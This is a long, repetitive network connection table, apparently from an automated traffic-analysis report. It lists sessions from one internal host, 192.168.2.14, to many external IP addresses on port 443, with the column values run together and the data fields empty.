                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21964192.168.2.1460744219.29.146.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21965192.168.2.145439063.3.137.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21966192.168.2.1435230143.242.101.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21967192.168.2.145220276.214.59.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21968192.168.2.14590684.220.87.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21969192.168.2.1454702137.163.2.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21970192.168.2.143802093.96.113.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21971192.168.2.144508658.16.247.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21972192.168.2.1439310134.100.100.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21973192.168.2.1455814204.81.144.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21974192.168.2.145505883.237.145.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21975192.168.2.1446768124.1.183.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21976192.168.2.1441252173.209.73.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21977192.168.2.1433360126.223.100.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21978192.168.2.1452162208.42.41.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21979192.168.2.1455868133.245.177.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21980192.168.2.1437092206.212.249.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21981192.168.2.144710664.163.43.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21982192.168.2.1455148167.33.6.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21983192.168.2.144381864.248.161.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21984192.168.2.1442386177.218.198.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21985192.168.2.1441406131.205.107.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21986192.168.2.144144277.248.133.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21987192.168.2.1455666207.91.37.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21988192.168.2.144590896.163.62.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21989192.168.2.145495273.160.103.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21990192.168.2.1451608173.96.251.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21991192.168.2.1433736181.67.106.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21992192.168.2.145963241.93.10.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21993192.168.2.1449004192.216.124.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21994192.168.2.14419742.87.162.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21995192.168.2.1442730173.132.129.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21996192.168.2.145398648.189.59.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21997192.168.2.144884474.173.109.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21998192.168.2.1451904219.140.84.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21999192.168.2.1452978139.142.223.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22000192.168.2.143506832.230.139.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22001192.168.2.144872257.162.56.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22002192.168.2.1444764124.230.107.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22003192.168.2.1453840156.45.97.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22004192.168.2.1435470222.129.220.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22005192.168.2.1453858109.80.130.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22006192.168.2.144118072.186.210.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22007192.168.2.1456110125.213.223.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22008192.168.2.1447698159.28.136.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22009192.168.2.144311413.14.244.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22010192.168.2.1444946219.132.83.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22011192.168.2.1443576129.4.252.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22012192.168.2.144230217.129.30.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22013192.168.2.145173266.10.202.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22014192.168.2.1454714187.110.250.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22015192.168.2.145963454.252.214.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22016192.168.2.144327231.156.30.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22017192.168.2.1443616204.68.217.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22018192.168.2.143316267.13.36.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22019192.168.2.1439636223.126.150.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22020192.168.2.1434828170.59.178.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22021192.168.2.143580075.119.236.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22022192.168.2.1440494171.59.201.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22023192.168.2.143695872.58.163.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22024192.168.2.1455370209.47.43.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22025192.168.2.1458398106.81.86.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22026192.168.2.144259624.143.40.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22027192.168.2.145502839.210.230.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22028192.168.2.1450402110.132.218.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22029192.168.2.144562082.153.89.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22030192.168.2.1442360221.9.37.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22031192.168.2.144113881.230.212.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22032192.168.2.145824685.87.212.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22033192.168.2.1447086178.52.102.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22034192.168.2.143964453.64.215.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22035192.168.2.1443294157.52.250.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22036192.168.2.1438164153.29.107.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22037192.168.2.144748681.252.203.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22038192.168.2.145074876.199.148.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22039192.168.2.1451882205.241.188.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22040192.168.2.144895452.113.41.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22041192.168.2.1437760223.157.155.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22042192.168.2.145063868.186.70.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22043192.168.2.1445762169.60.244.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22044192.168.2.144305027.165.252.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22045192.168.2.144424438.180.55.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22046192.168.2.1433452128.115.169.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22047192.168.2.1440804152.169.50.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22048192.168.2.1457998217.65.141.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22049192.168.2.1433250114.198.81.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22050192.168.2.1438718117.112.222.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22051192.168.2.1435522128.77.228.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22052192.168.2.145061612.221.4.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22053192.168.2.1454160188.6.119.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22054192.168.2.145614260.112.189.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22055192.168.2.145521667.46.93.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22056192.168.2.144492023.201.44.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22057192.168.2.144538077.46.5.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22058192.168.2.1450598202.158.27.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22059192.168.2.1446684135.51.100.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22060192.168.2.1450314112.202.26.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22061192.168.2.1440716157.73.91.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22062192.168.2.1450358115.172.2.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22063192.168.2.145697681.89.30.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22064192.168.2.143779663.219.66.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22065192.168.2.1449144219.32.248.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22066192.168.2.1437592119.132.232.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22067192.168.2.145303489.98.193.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22068192.168.2.145415054.218.145.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22069192.168.2.145652846.215.127.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22070192.168.2.1436586102.4.72.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22071192.168.2.1442652136.23.156.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22072192.168.2.1438984217.203.91.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22073192.168.2.145533814.182.145.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22074192.168.2.1445110126.16.196.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22075192.168.2.143735468.204.13.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22076192.168.2.146063434.202.52.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22077192.168.2.1454972142.235.21.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22078192.168.2.145099882.146.13.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22079192.168.2.1454886198.166.92.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22080192.168.2.144973499.56.218.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22081192.168.2.144728875.108.230.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22082192.168.2.1446618158.156.202.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22083192.168.2.144290251.3.99.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22084192.168.2.1454326121.23.94.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22085192.168.2.1446004112.32.133.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22086192.168.2.144689457.48.164.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22087192.168.2.1437402208.86.121.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22088192.168.2.1448294216.64.181.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22089192.168.2.1444092156.62.194.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22090192.168.2.143335690.98.221.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22091192.168.2.1438534133.71.108.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22092192.168.2.1449218146.199.126.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22093192.168.2.1444930118.145.74.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22094192.168.2.1438634100.255.214.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22095192.168.2.1446096126.110.117.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22096192.168.2.144894217.33.57.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22097192.168.2.144048858.14.16.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22098192.168.2.1458266221.65.98.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22099192.168.2.1441750149.119.150.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22100192.168.2.1443352187.191.24.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22101192.168.2.1451250186.20.75.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22102192.168.2.1445142186.177.111.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22103192.168.2.1447892213.251.119.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22104192.168.2.144174654.172.243.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22105192.168.2.1433144177.121.224.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22106192.168.2.143338220.171.174.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22107192.168.2.1448908182.196.81.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22108192.168.2.144841438.0.11.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22109192.168.2.145851632.66.248.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22110192.168.2.1435314132.69.190.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22111192.168.2.144478267.135.91.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22112192.168.2.144254825.147.91.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22113192.168.2.143696885.3.232.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22114192.168.2.1438524134.91.64.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22115192.168.2.143922472.115.175.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22116192.168.2.1437684136.249.209.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22117192.168.2.143949687.242.6.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22118192.168.2.1455436154.97.29.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22119192.168.2.1438358186.242.201.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22120192.168.2.1445678209.14.141.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22121192.168.2.1458534175.11.198.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22122192.168.2.144647877.235.114.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22123192.168.2.1437140181.144.38.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22124192.168.2.1459428151.139.190.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22125192.168.2.145864878.1.139.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22126192.168.2.1454548167.51.32.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22127192.168.2.143301074.252.240.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22128192.168.2.1434694138.95.136.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22129192.168.2.1450058103.169.199.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22130192.168.2.145137493.69.41.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22131192.168.2.144021217.224.239.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22132192.168.2.1436330141.49.249.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22133192.168.2.1456246145.170.164.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22134192.168.2.1456468143.81.98.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22135192.168.2.144771890.97.211.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22136192.168.2.145033272.83.174.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22137192.168.2.1435516208.132.201.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22138192.168.2.1457480181.3.190.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22139192.168.2.144371064.236.172.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22140192.168.2.1459200135.97.224.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22141192.168.2.143606068.41.16.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22142192.168.2.1444442151.26.244.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22143192.168.2.14444769.229.100.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22144192.168.2.145962486.183.91.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22145192.168.2.1458308119.128.158.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22146192.168.2.144235214.9.80.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22147192.168.2.144125496.204.229.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22148192.168.2.146040817.166.254.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22149192.168.2.1457906222.224.213.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22150192.168.2.1433686207.149.53.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22151192.168.2.1440532141.18.178.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22152192.168.2.1456682194.21.125.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22153192.168.2.1445896137.154.104.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22154192.168.2.1445570147.137.211.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22155192.168.2.144702086.89.228.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22156192.168.2.1441606206.168.197.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22157192.168.2.1457342122.172.173.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22158192.168.2.1440990154.241.36.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22159192.168.2.1458912174.8.102.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22160192.168.2.1456694147.219.41.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22161192.168.2.146064687.125.116.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22162192.168.2.1445154199.192.215.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22163192.168.2.1442484201.230.12.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22164192.168.2.144569647.235.6.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22165192.168.2.1443858196.131.95.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22166192.168.2.145241294.47.111.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22167192.168.2.1440694154.3.40.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22168192.168.2.1440676170.97.192.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22169192.168.2.1460282132.250.66.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22170192.168.2.143542060.242.40.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22171192.168.2.1447946191.6.162.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22172192.168.2.144167076.34.197.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22173192.168.2.1433774103.166.13.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22174192.168.2.145249276.26.149.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22175192.168.2.1459514176.9.77.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22176192.168.2.1441554174.251.40.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22177192.168.2.143935034.53.29.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22178192.168.2.1457840113.105.190.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22179192.168.2.1444150217.114.89.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22180192.168.2.1444356166.204.175.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22181192.168.2.1447112104.138.101.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22182192.168.2.1443420221.146.177.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22183192.168.2.1456094198.148.117.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22184192.168.2.1452250196.170.225.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
